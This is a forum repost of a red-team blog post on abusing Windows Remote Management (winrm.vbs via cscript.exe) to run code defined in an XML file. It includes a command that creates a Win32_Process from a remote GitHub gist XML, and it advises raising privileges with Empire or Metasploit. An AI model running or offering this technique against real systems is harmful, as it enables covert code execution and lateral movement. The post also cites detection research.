Nytro Posted February 4, 2019 Report Posted February 4, 2019 Matt harr0ey Feb 2 Introduction This beginning alludes to give point simple concept related to using Winrm.vbs to do code executed by XML file so I could collect a few ideas we totally can use to do a simple method is being offered by the red team like Winrm.vbs is getting more popular so I found some things can’t waste any more time to release them, Winrm.vbs ==> Windows Remote Management Synopsis Winrm is simple service to manage your code execute or instruction on any systems via your computer using WS-Management protocol but this service isn’t being offered here in this a blog post I just give local execute but this may happen remotely if you connect with any servers or computers further information,https://docs.microsoft.com/en-us/windows/desktop/winrm/about-windows-remote-management Usage XML/Winrm.vbs First of all if you just heard about XML/Winrm.vbs here at this time when you saw this a blog post I would say, Yes this research winrm.vbs is totally different from any XML codes else so you can go to have a look at this Microsoft’s concept It gives good description to understand Winrm’s instruction to use So what’s the relationship between normal XML and Winrm XML I think the different from normal XML code and Winrm.vbs code is simple different between them there is something called normal XML is easy to understand but it doesn’t Winrm’s XML isn’t, but Winrm.vbs XML has different codes and different uses from normal XML so let’s go to have a look at picture contains a bit instruction related to WInrm’s XML code MS-Windows Remote management Small notes guys It’s better for you to take full privileges Open as administrator or if you use any platforms Empire Powershell or MSF you can go to get more high level than normal session but don’t forget to use Get-TokenPrvivshttps://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-TokenPrivs.ps1 Currently we have graphic inside a picture shows some information is beneficial for you how XML’s code is being implemented via XML instructions, but be careful because normal language XML cannot be used by Winrm.vbs I think we must use only Winrm’s XML language and Its version, These some instructions take you to how you can execute XML/Winrm.vbs via Cscript.exe although I found something else related to the same execute Winrm.vbs but It doesn’t work on my version windows but may works on Windows server2008 or others versions as well, if you have VM and Windows server2008 you can use this research remotely This text shows remote execute and next picture shows local execute cscript.exe winrm.vbs invoke Create wmicimv2/Win32_Process -SkipCAcheck -SkipCNcheck -remote:https://gist.githubuserconten t.com/homjxi0e/da3a5f4b5f48d60b156960bf27a4d164/raw/b615f853cf962566a516a320e9324fbfdcb124fc/PoCWinrm.xml Here you can look forward to seeing another new Winrm a blog post detected ( RedCanary ) Reference, Lateral Movement Using WinRM and WMIhttps://www.redcanary.com/blog/lateral-movement-winrm-wmi/ Sursa: https://medium.com/@mattharr0ey/round-of-use-winrm-code-execution-xml-6e3219d3e31 1 Quote
